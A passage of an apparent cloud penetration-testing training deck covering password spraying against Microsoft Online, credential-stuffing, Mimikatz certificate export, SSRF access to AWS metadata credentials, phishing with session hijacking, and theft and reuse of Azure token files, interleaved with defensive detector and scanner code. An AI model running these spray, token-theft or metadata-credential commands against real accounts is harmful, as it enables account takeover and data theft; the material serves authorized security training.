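    '{"time": "2020-03-02T09:00:10Z", "user": "a.smith@example.com", "ip": "203.0.113.5", "code": "50126"}',
    '{"time": "2020-03-02T09:00:41Z", "user": "b.jones@example.com", "ip": "203.0.113.5", "code": "50126"}',
    '{"time": "2020-03-02T09:01:12Z", "user": "c.wu@example.com",    "ip": "203.0.113.5", "code": "50057"}',
    '{"time": "2020-03-02T09:01:44Z", "user": "d.khan@example.com",  "ip": "203.0.113.5", "code": "50126"}',
    '{"time": "2020-03-02T09:02:15Z", "user": "e.ortiz@example.com", "ip": "203.0.113.5", "code": "50076"}',
    '{"time": "2020-03-02T09:02:47Z", "user": "f.novak@example.com", "ip": "203.0.113.5", "code": "50126"}',
    '{"time": "2020-03-02T09:03:18Z", "user": "g.li@example.com",    "ip": "203.0.113.5", "code": "50126"}',
    '{"time": "2020-03-02T09:03:50Z", "user": "h.berg@example.com",  "ip": "203.0.113.5", "code": "50053"}',
    '{"time": "2020-03-02T09:10:00Z", "user": "j.doe@example.com",   "ip": "198.51.100.7", "code": "50126"}',
    '{"time": "2020-03-02T09:10:20Z", "user": "j.doe@example.com",   "ip": "198.51.100.7", "code": "50126"}',
    '{"time": "2020-03-02T09:10:45Z", "user": "j.doe@example.com",   "ip": "198.51.100.7", "code": "50126"}',
    '{"time": "2020-03-02T09:11:05Z", "user": "j.doe@example.com",   "ip": "198.51.100.7", "code": "0"}',
]


def parse_record(line):
    rec = json.loads(line)
    rec["time"] = datetime.strptime(rec["time"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect_spray(lines, window_minutes=30, min_users=5, max_per_user=2):
    """
    One alert per source IP whose failures inside any window_minutes span hit at least
    min_users distinct accounts with no single account failing more than max_per_user times.
    The alert also lists accounts the same source got past the password on in that window.
    """
    window = timedelta(minutes=window_minutes)
    by_ip = defaultdict(list)
    for rec in sorted(map(parse_record, lines), key=lambda r: r["time"]):
        by_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, events in by_ip.items():
        start = 0
        for end in range(len(events)):                     # sliding window over this source
            while events[end]["time"] - events[start]["time"] > window:
                start += 1
            span = events[start:end + 1]
            failures = Counter(e["user"] for e in span if e["code"] in FAILURE_CODES)
            if not failures or len(failures) < min_users or max(failures.values()) > max_per_user:
                continue
            accepted = sorted({e["user"] for e in span if e["code"] in PASSWORD_ACCEPTED})
            best = alerts.get(ip)
            if best is None or len(failures) > best["distinct_accounts"]:
                alerts[ip] = {"ip": ip, "distinct_accounts": len(failures),
                              "first_seen": span[0]["time"].isoformat(),
                              "last_seen": span[-1]["time"].isoformat(),
                              "password_accepted": accepted}
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

The `max_per_user` cap is what separates a spray from a shared egress address with a handful of users who mistype their passwords; tune `min_users` to the size of the tenant, and treat any account in `password_accepted` as one whose password is now known to the source.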

Password Attacks
• Credential Stuffing
  • Using previously breached credentials to attempt to exploit password reuse on corporate accounts
  • People tend to reuse passwords for multiple sites including corporate accounts
  • Various breaches end up publicly posted
  • Search these and try out creds
  • Try iterating creds

Password Attacks
• Password Spraying Microsoft Online (Azure/O365)
• Can spray https://login.microsoftonline.com
POST /common/oauth2/token HTTP/1.1
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Host: login.microsoftonline.com
Content-Length: 195
Expect: 100-continue
Connection: close

resource=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgraph.windows.net&client_id=1b730954-1685-4b74-9bfd-dac224a7b894&client_info=1&grant_type=password&username=user%40targetdomain.com&password=Winter2020&scope=openid

Password Attacks
• Use MSOLSpray to do this:
• https://github.com/dafthack/MSOLSpray
• The script logs:
• If a user cred is valid
• If MFA is enabled on the account
• If a tenant doesn't exist
• If a user doesn't exist
• If the account is locked
• If the account is disabled
• If the password is expired

LAB
Password Spraying

LAB: Password Spraying
• GOAL: Perform a password spray attack against a list of target
Microsoft Azure users.
• In this lab you will simulate what a password spray attack against
a target Microsoft Azure customer would look like. To do this,
you will be creating a target list of fake account names along
with your own account that you know the credential for. Then,
we will use a PowerShell tool to perform the password spray.

LAB: Password Spraying
• We will be using the Windows
VM for the next few labs!
• First, let’s download the MSOL password spraying script MSOLSpray from https://github.com/dafthack/MSOLSpray.
• Navigate to the repo in a
browser then click
MSOLSpray.ps1 to load the
contents of the script.
LAB: Password Spraying
• Next, click the “Raw” button towards the top right of the script.
• Copy the entire script and paste it into a new text file, then save
it to your system as MSOLSpray.ps1. Make sure to change the
“Save as type” to “All Files”.

LAB: Password Spraying
• Create a text file with ten (10) fake users we will spray along with
your own user account
([email protected] ). (Do not spray
accounts you do not own. You may use my domain
“glitchcloud.com” for generating fake target users)
• Save this file as “userlist.txt” in the same location as MSOLSpray.ps1

LAB: Password Spraying
• Start a new PowerShell window.
• Change directories to where you stored MSOLSpray.ps1 and the
userlist file.
• Next import MSOLSpray, and run the spray
PS> Import-Module .\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password you set for your test account]

Password Protection &
Smart Lockout
• Azure Password Protection –
Prevents users from picking
passwords with certain words like
seasons, company name, etc.
• Azure Smart Lockout – Locks out
auth attempts whenever brute
force or spray attempts are
detected.
• Can be bypassed with FireProx +
MSOLSpray
• https://github.com/ustayready/fireprox
Web Server Exploitation
• Web server exploitation is a big topic
• Here are some generic things to look for:
• Out-of-date web technologies with known vulns
• SQL or command injection vulns
• Server-Side Request Forgery (SSRF)
• Good place to start post-shell:
• Creds in the Metadata Service
• Certificates
• Environment variables
• Storage accounts

Web Server Exploitation
• Reused access certs as private keys on web servers
• Compromise web server
• Extract certificate with Mimikatz
• Use it to authenticate to Azure
• Mimikatz can export “non-exportable” certificates
mimikatz# crypto::capi
mimikatz# privilege::debug
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine /store:my /export

AWS Instance Metadata
URL
• Cloud servers hosted on services like EC2 needed a way to
orient themselves because of how dynamic they are
• A “Metadata” endpoint was created and hosted on a non-
routable IP address at 169.254.169.254
• Can contain access/secret keys to AWS and IAM credentials
• This should only be reachable from the localhost
• Server compromise or SSRF vulnerabilities might allow remote
attackers to reach it

AWS Instance Metadata
URL
• IAM credentials can be stored here:
• http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>
• Can potentially hit it externally if a proxy service (like Nginx) is
being hosted in AWS.
• curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo
• CapitalOne Hack
• Attacker exploited SSRF on an EC2 server and accessed the metadata URL to
get IAM access keys. Then, used the keys to dump an S3 bucket containing
100 million individuals’ data
AWS Instance Metadata
URL
• AWS EC2 Instance Metadata service Version 2 (IMDSv2)
• Updated in November 2019 – Both v1 and v2 are available
• Supposed to defend the metadata service against SSRF and
reverse proxy vulns
• Added session auth to requests
• First, a “PUT” request is sent and then responded to with a token
• Then, that token can be used to query data
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
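The two-step exchange above, played out against a local stand-in so it can be run offline (an added example, not AWS code or code from the slides): a tiny HTTP service on 127.0.0.1 enforces the v2 rules (PUT /latest/api/token with the TTL header returns a token; data paths require X-aws-ec2-metadata-token) plus IMDSv2's documented refusal to issue tokens to requests carrying an X-Forwarded-For header, and the client shows why a plain SSRF GET or a proxied PUT gets nothing. The role name and credential document are constructed placeholders.

```python
"""Local stand-in for the IMDSv2 session-token exchange.

Added example for this page, not AWS code. A tiny HTTP service on
127.0.0.1 mirrors the v2 rules the slide shows (PUT /latest/api/token with
a TTL header returns a token; data paths need X-aws-ec2-metadata-token) and
the documented refusal to issue tokens to requests that carry X-Forwarded-For.
It never contacts 169.254.169.254; the role credentials are placeholders.
"""
import json
import secrets
import threading
import time
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

TOKENS = {}       # token -> expiry, in time.monotonic() seconds
MAX_TTL = 21600   # IMDSv2 caps a session token at six hours
ROLE = "example-role"
FAKE_CREDS = {"AccessKeyId": "AKIA-PLACEHOLDER", "SecretAccessKey": "PLACEHOLDER"}


class FakeIMDS(BaseHTTPRequestHandler):
    def log_message(self, *args):
        pass  # keep the demo quiet

    def _send(self, code, body=""):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        if self.path != "/latest/api/token":
            return self._send(404)
        # Requests relayed by a proxy carry X-Forwarded-For; v2 refuses them.
        if "X-Forwarded-For" in self.headers:
            return self._send(403)
        ttl = self.headers.get("X-aws-ec2-metadata-token-ttl-seconds", "")
        if not ttl.isdigit() or not 1 <= int(ttl) <= MAX_TTL:
            return self._send(400)
        token = secrets.token_urlsafe(32)
        TOKENS[token] = time.monotonic() + int(ttl)
        self._send(200, token)

    def do_GET(self):
        # Token-required mode: no valid, unexpired token means no data at all.
        token = self.headers.get("X-aws-ec2-metadata-token")
        if token not in TOKENS or TOKENS[token] < time.monotonic():
            return self._send(401)
        if self.path == "/latest/meta-data/iam/security-credentials/":
            return self._send(200, ROLE)
        if self.path == f"/latest/meta-data/iam/security-credentials/{ROLE}":
            return self._send(200, json.dumps(FAKE_CREDS))
        self._send(404)


def start_server():
    """Start the fake endpoint on a free localhost port; return (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakeIMDS)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def request(base, method, path, headers=None):
    """Return (status, body) without raising on 4xx responses."""
    req = urllib.request.Request(base + path, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=2) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, ""


def run_exchange(base):
    """Play both sides of the exchange and record the status of each step."""
    creds_path = "/latest/meta-data/iam/security-credentials/"
    ttl_header = {"X-aws-ec2-metadata-token-ttl-seconds": str(MAX_TTL)}
    results = {}
    # A typical SSRF only controls the URL of a GET: no token, no data.
    results["get_without_token"] = request(base, "GET", creds_path)[0]
    # A PUT that arrived through a reverse proxy is refused a token.
    proxied = {**ttl_header, "X-Forwarded-For": "203.0.113.7"}
    results["put_via_proxy"] = request(base, "PUT", "/latest/api/token", proxied)[0]
    # The legitimate two-step: PUT for a token, then GET with it.
    status, token = request(base, "PUT", "/latest/api/token", ttl_header)
    results["put_token"] = status
    results["get_with_token"] = request(base, "GET", creds_path,
                                        {"X-aws-ec2-metadata-token": token})
    return results


if __name__ == "__main__":
    server, base = start_server()
    print(run_exchange(base))
    server.shutdown()
```

On a real instance the v1 GET keeps working until the instance metadata options require tokens (`aws ec2 modify-instance-metadata-options --http-tokens required`); the slide's note that both versions are available describes that default.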
Phishing
• Phishing is still the #1 method of
compromise
• Target Cloud engineers, Developers,
DevOps, etc.
• Two primary phishing techniques:
• Cred harvesting / session hijacking
• Remote workstation compromise w/ C2

Phishing: Session Hijack
• Attack designed to steal creds and/or
session cookies
• Can be useful when security
protections prevent getting shells
• Email a link to a target employee
pointing to cloned auth portal
• Examples: Microsoft Online (O365,
Azure, etc.), G-Suite, AWS Console
• They auth and get real session
cookies… we get them too.

Phishing: Session Hijack
• Evilginx2 and Modlishka
• MitM frameworks for harvesting
creds/sessions
• Can also evade 2FA by riding user
sessions
• With a hijacked session we need
to move fast
• Session timeouts can limit access
• Persistence is necessary

Phishing: G-Suite
• Calendar Event Injection
• Silently injects events to target calendars
• No email required
• Google API allows marking the event as accepted
• Bypasses the “don’t auto-add” setting
• Creates urgency w/ reminder notification
• Include link to phishing page

Phishing: Remote
Access
• Phish to compromise a user’s workstation
• Enables many other options for gaining access to cloud resources
• Steal access tokens from disk
• Session hijack
• Keylog

Steal Access Tokens
• Google JSON Tokens and
credentials.db
• JSON tokens typically used for
service account access to GCP
• If a user authenticates with gcloud
from an instance their creds get
stored here:
~/.config/gcloud/credentials.db
sudo find /home -name "credentials.db"
• JSON can be used to authenticate
with gcloud and ScoutSuite
Steal Access Tokens
• Azure Cloud Service Packages (.cspkg)
• Deployment files created by Visual
Studio
• Possible other Azure service
integration (SQL, Storage, etc.)
• Look through cspkg zip files for
creds/certs
• Search Visual Studio Publish directory
<cloud project directory>\bin\debug\publish

Steal Access Tokens
• Azure Publish Settings files (.publishsettings)
• Designed to make it easier for developers to push code to Azure
• Can contain a Base64 encoded Management Certificate
• Sometimes cleartext credentials
• Open publishsettings file in text editor
• Save “ManagementCertificate” section into a new .pfx file
• There is no password for the pfx
• Search the user’s Downloads directory and VS projects

Extract Keys From
Storage Explorers
• Developers often use storage explorers to easily upload and
download files to Azure
• It may be possible to extract storage credentials from these
tools
• Storage Explorers store credentials on disk (Windows Credential
Manager) and then use them to authenticate to services such as
Azure
• There are a number of different storage explorers that change
frequently
• Azure Storage Explorer for example has a built-in “Developer
Tools” function that you can use to set breakpoints while loading
the credentials allowing you to view them while unencrypted.
Steal Access Tokens
• Web Config and App Config files
• Commonly found on pentests to include cleartext creds
• WebApps often need read/write access to cloud storage or DBs
• Web.config and app.config files might contain creds or access tokens
• Look for management cert and extract to pfx like publishsettings files
• Often found in root folder of webapp

Steal Access Tokens
• Internal Code Repositories
• Gold mine for keys
• Find internal repos:
• A. Portscan internal web services (80, 443, etc.) then use EyeWitness to
screenshot each service to quickly analyze
• B. Query AD for all hostnames, look for subdomains git, code, repo,
bitbucket, gitlab, etc..
• Can use automated tools (gitleaks, trufflehog, gitrob) or use built-
in search features
• Search for AccessKey, AKIA, id_rsa, credentials, secret, password, and token
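A minimal regex-plus-entropy scanner for the search terms listed above, written as an added example (not code from the slides or from gitleaks) in the shape of a pre-commit gate that checks only the lines a diff adds. The diff is constructed; the AKIA/secret pair in it is AWS's published, non-functional documentation example rather than a live key.

```python
"""Regex-plus-entropy scan of a diff for the secret patterns listed above.

Added example, not the slides' or gitleaks' code: a minimal pre-commit style
scanner. The diff is constructed; the AKIA/secret pair is AWS's published,
non-functional documentation example, not a live key.
"""
import math
import re

SAMPLE_DIFF = """\
diff --git a/config/settings.py b/config/settings.py
--- a/config/settings.py
+++ b/config/settings.py
@@ -1,4 +1,8 @@
 import os
-aws_access_key_id = AKIAI44QH8DHBEXAMPLE
+aws_access_key_id = AKIAIOSFODNN7EXAMPLE
+aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
+db_password = os.environ["DB_PASSWORD"]
+token = "xxxxxxxxxxxxxxxxxxxxxxxx"
+-----BEGIN RSA PRIVATE KEY-----
"""

# Ordered: specific rules first, the generic keyword rule last.
RULES = [
    ("private_key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("keyword_high_entropy", re.compile(
        r"(?i)(password|secret|token|access_?key)\w*\s*[:=]\s*['\"]?([^\s'\"]{12,})")),
]
ENTROPY_THRESHOLD = 3.5  # bits per character; placeholders score far lower


def shannon_entropy(value):
    """Shannon entropy of `value` in bits per character."""
    length = len(value)
    return -sum(value.count(c) / length * math.log2(value.count(c) / length)
                for c in set(value))


def redact(value, keep=4):
    """Keep a short prefix so the finding is recognisable without re-leaking it."""
    return value[:keep] + "*" * (len(value) - keep)


def scan_diff(diff_text):
    """Return findings for added lines only ('+' lines, excluding the '+++' header).

    Removed lines are skipped: a pre-commit gate cares about what is about to
    enter history. A key already in history is the job of a full-history tool
    such as gitleaks, which the slides cover."""
    findings = []
    for lineno, line in enumerate(diff_text.splitlines(), start=1):
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for rule, pattern in RULES:
            match = pattern.search(line)
            if not match:
                continue
            value = match.group(2) if rule == "keyword_high_entropy" else match.group(0)
            if rule == "keyword_high_entropy" and shannon_entropy(value) < ENTROPY_THRESHOLD:
                continue  # low-entropy value such as "xxxx..." is a placeholder
            shown = value if rule == "private_key" else redact(value)
            findings.append({"line": lineno, "rule": rule, "value": shown})
            break  # one finding per line; a specific rule wins over the generic one
    return findings


if __name__ == "__main__":
    for finding in scan_diff(SAMPLE_DIFF):
        print(finding)
```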

Steal Access Tokens
• Check %USERPROFILE%\.azure\ for auth tokens
• During an authenticated session with the Az PowerShell module a
TokenCache.dat file gets generated in the %USERPROFILE%\.azure\
folder.
• Also search disk for other saved context files (.json)
• Multiple tokens can exist in the same context file

Steal Access Tokens
• Command history
• The commands ran previously may
indicate where to look
• Sometimes creds get passed to the
command line
• Linux hosts command history is here:
• ~/.bash_history
• PowerShell command history is here:
• %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

LAB
Authenticate to Azure With Stolen Access Tokens

LAB: Access Tokens Auth
• GOAL: Steal Azure access tokens from a compromised system and
use them to authenticate to Azure.
• In this lab you will simulate stealing access tokens from a target
user who was using the Az PowerShell module. To set this up you
will first authenticate using the Az PowerShell module in the
Windows VM. After copying the tokens to a separate location you
will delete the primary token location and close the authenticated
session. You will then manipulate the tokens so they can be used
to authenticate in a new PowerShell session.

LAB: Access Tokens Auth
• First, let’s generate some tokens that we will “steal” from our victim
• Open a new PowerShell window and import the Az module
PS> Import-Module Az
• Log in using your Azure AD account with the Connect-AzAccount
command
PS> Connect-AzAccount

LAB: Access Tokens Auth
• Make a new directory called C:\Temp\
PS> mkdir C:\Temp
• In your PowerShell window
PS> Save-AzContext -Path C:\Temp\AzureAccessToken.json
• We will come back to the saved context file later on

LAB: Access Tokens Auth
• Make a new directory at C:\Temp\Live Tokens\
PS> mkdir "C:\Temp\Live Tokens"
• Open Windows Explorer and type %USERPROFILE%\.Azure\
and hit enter
• Copy TokenCache.dat & AzureRmContext.json to
C:\Temp\Live Tokens
• Now close your authenticated PowerShell window!

LAB: Access Tokens Auth
• Delete everything in %USERPROFILE%\.azure\
• Start a brand new PowerShell window and run:
PS> Import-Module Az
PS> Get-AzContext -ListAvailable
• You shouldn’t see any available contexts currently

LAB: Access Tokens Auth
• In your PowerShell window let’s manipulate the stolen
TokenCache.dat and AzureRmContext.json files so we can import them
into our PowerShell session
PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding byte
PS> $b64 = [Convert]::ToBase64String($bytes)
PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64

LAB: Access Tokens Auth
• Now let’s add the b64-token.txt to the AzureRmContext.json
file.
• Open the C:\Temp\Live Tokens folder.
• Open the AzureRmContext.json file in Notepad and find the line
near the end of the file titled “CacheData”. It should be null.

LAB: Access Tokens Auth
• Delete the word “null” on this line
• Where “null” was add two quotation marks (“”) and then paste
the contents of b64-token.txt in between them.
• Save this file as C:\Temp\Live Tokens\StolenToken.json

LAB: Access Tokens Auth
• Let’s import the new token
PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'
• We are now operating in an authenticated session to Azure
PS> $context = Get-AzContext
PS> $context.Account

LAB: Access Tokens Auth
• You can import the previously exported context
(AzureAccessToken.json) the same way

Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Post-Compromise Recon
• AWS
• Google
• Azure
• LAB: Azure Situational Awareness

Post-Compromise
Reconnaissance

Post-Compromise Recon
• Who do we have access as?
• What roles do we have?
• Is MFA enabled?
• What can we access (webapps, storage, etc.?)
• Who are the admins?
• How are we going to escalate to admin?
• Any security protections in place (ATP, GuardDuty, etc.)?

AWS
• What do our access keys give us access to?
• WeirdAAL – Great tool for enumerating AWS access by Chris
Gates
• https://github.com/carnal0wnage/weirdAAL
• Run the recon_all module to learn a great deal about your access

Google
• Cloud Storage, Compute, SQL,
Resource manager, IAM
• ScoutSuite from NCC group
• https://github.com/nccgroup/ScoutSuite
• Tool for auditing multiple different
cloud security providers
• Create Google JSON token to auth
as service account

Azure
• What can we learn with a basic user?
• Subscription Info
• User Info
• Resource Groups
• Scavenging Runbooks for Creds

Azure
• Standard users can access Azure domain
information, and it isn’t usually locked down
• Authenticated users can go to portal.azure.com
and click Azure Active Directory
• O365 Global Address List has this info as well
• Even if portal is locked down PowerShell cmdlets
will still likely work
• There is a company-wide setting that locks down
the entire org from viewing Azure info via cmd line:
• Set-MsolCompanySettings -UsersPermissionToReadOtherUsersEnabled $false
Azure: CLI Access
• Azure Service Management (ASM or Azure “Classic”)
• Legacy and recommended to not use
• Azure Resource Manager (ARM)
• Added service principals, resource groups, and more
• Management Certs not supported
• PowerShell Modules
• Az, AzureAD & MSOnline
• Azure Cross-platform CLI Tools
• Linux and Windows client

Azure: Subscriptions

• Organizations can have multiple subscriptions

Azure: Subscriptions
• A good first step is to determine
what subscription you are in
• The subscription name is usually
informative
• It might have “Prod”, or “Dev” in
the title
• Multiple subscriptions can be
under the same Azure AD
directory (tenant)
• Each subscription can have
multiple resource groups
Azure: User Information
• Built-In Azure Subscription Roles
• Owner (full control over resource)
• Contributor (All rights except the ability to change permissions)
• Reader (can only read attributes)
• User Access Administrator (manage user access to Azure resources)

Azure: User Information
• Get the current user’s role assignment
PS> Get-AzRoleAssignment
• If the Azure portal is locked down it is still possible to access
Azure AD user information via MSOnline cmdlets
• The below examples enumerate users and groups
PS> Get-MSolUser -All
PS> Get-MSolGroup -All
PS> Get-MSolGroupMember -GroupObjectId <GUID>
• Pipe Get-MSolUser -All to Format-List to get all user attributes
PS> Get-MSolUser -All | fl

Azure: Resource Groups
• Resource Groups collect various services for easier management
• Recon can help identify the relationships between services such
as WebApps and SQL
PS> Get-AzResource
PS> Get-AzResourceGroup

Azure: Runbooks
• Azure Runbooks automate various tasks in Azure
• Require an Automation Account and can contain sensitive
information like passwords
PS> Get-AzAutomationAccount
PS> Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
• Export a runbook with:
PS> Export-AzAutomationRunbook -AutomationAccountName <account name> -ResourceGroupName <resource group name> -Name <runbook name> -OutputFolder .\Desktop\

LAB
Azure Situational Awareness

LAB: Azure Situational
Awareness
• GOAL: Use the MSOnline and Az PowerShell modules to do
basic enumeration of an Azure account post-compromise.
• In this lab you will authenticate to Azure using the Azure AD
account you set up. Then, you will import the MSOnline and Az
PowerShell modules and try out some of the various cmdlets
that assist in enumerating Azure resource usage.

LAB: Azure Situational
Awareness
• Start a new PowerShell window and import both the MSOnline
and Az modules
PS> Import-Module MSOnline
PS> Import-Module Az
Authenticate to each service with your Azure AD account:
PS> Connect-AzAccount
PS> Connect-MsolService

LAB: Azure Situational
Awareness
• First, get some basic Azure information with Get-MSolCompanyInformation
• Some interesting items here are
• UsersPermissionToReadOtherUsersEnabled
• DirSyncServiceAccount
• PasswordSynchronizationEnabled
• Address/phone/emails
PS> Get-MSolCompanyInformation

LAB: Azure Situational
Awareness
• Next, we will start looking at the subscriptions associated with
the account as well as look at the current context we are
operating in. Look at the “Name” of the subscription and
context for possible indication as to what it is associated with.
PS> Get-AzSubscription
PS> $context = Get-AzContext
PS> $context.Name
PS> $context.Account

LAB: Azure Situational
Awareness
• Enumerating the roles assigned to your user will help identify
what permissions you might have on the subscription as well as
who to target for escalation.
PS> Get-AzRoleAssignment

LAB: Azure Situational
Awareness
• List out the users on the subscription. This is the equivalent of
“net users /domain” in on-prem AD
PS> Get-MSolUser -All
• The user you set up likely doesn’t have any resources currently
associated with it, but these commands will help you understand
the specific resources a user you gain access to has.
PS> Get-AzResource
PS> Get-AzResourceGroup

LAB: Azure Situational
Awareness
• There are many other functions.
• Use Get-Module to list out the
other Az module groups
• To list out functions available within
each module use the below
command substituting the value of
the “Name” parameter.
PS> Get-Module -Name Az.Accounts | Select-Object -ExpandProperty ExportedCommands
PS> Get-Module -Name MSOnline | Select-Object -ExpandProperty ExportedCommands

Azure: Tools
• ROADtools by Dirk-jan Mollema
• https://github.com/dirkjanm/ROADtools
• Dumps all Azure AD info from the
Microsoft Graph API
• Has a GUI for interacting with the
data
• Plugin for BloodHound with
connections to on-prem AD
accounts if DirSync is enabled

Azure: Tools
• More tools to automate post-compromise
• PowerZure
• https://github.com/hausec/PowerZure
• MicroBurst
• https://github.com/NetSPI/MicroBurst
• ScoutSuite
• https://github.com/nccgroup/ScoutSuite

Review
• Authentication Methods
• Reconnaissance
• Exploiting Misconfigurations
• Gaining Access
• Post-Compromise Recon

What's Next?
• More Offensive Tradecraft Cloud Penetration Testing Training:
• Pillaging Cloud Assets
• Persistence, Privilege Escalation, Data Harvesting
• Cloud Infrastructure Attacks
• Services, VMs, Network Pivots, Domain Attacks, DevOps, Scanning Tools
• Weaponizing the Cloud for Red Team Operations
• Domain Fronting, Redirectors, Azure DevOps, Cloud Phishing Infrastructure

The End
• Follow me on Twitter
• Beau Bullock - @dafthack
• Black Hills Information Security
• https://www.blackhillsinfosec.com
• @BHInfoSecurity

References
• https://www.microsoft.com/en-us/msrc/pentest-rules-of-engagement
• https://aws.amazon.com/security/penetration-testing/
• https://support.google.com/cloud/answer/6262505?hl=en
• https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs
• https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
• https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed
• https://docs.microsoft.com/en-us/azure/api-management/api-management-howto-mutual-certificates
• https://aws.amazon.com/blogs/security/guidelines-for-protecting-your-aws-account-while-using-programmatic-access/
• https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction
• https://www.trustedsec.com/blog/owning-o365-through-better-brute-forcing/
• https://blog.netspi.com/anonymously-enumerating-azure-file-resources/
• https://github.com/NetSPI/MicroBurst
• https://www.shellntel.com/blog/2019/8/27/aws-metadata-endpoint-how-to-not-get-pwned-like-capital-one
• https://rhinosecuritylabs.com/cloud-security/aws-security-vulnerabilities-perspective/
• https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a

References (Continued)
• https://www.cloudhealthtech.com/blog/aws-vs-azure-vs-google
• https://github.com/bishopfox/dufflebag
• https://github.com/dafthack/PowerMeta
• https://github.com/zricethezav/gitleaks
• https://blog.appsecco.com/an-ssrf-privileged-aws-keys-and-the-capital-one-breach-4c3c2cded3af
• https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomain-takeover
• https://lares.com/hunting-azure-admins-for-vertical-escalation
• https://nostarch.com/azure
• https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles
• https://github.com/dirkjanm/ROADtools
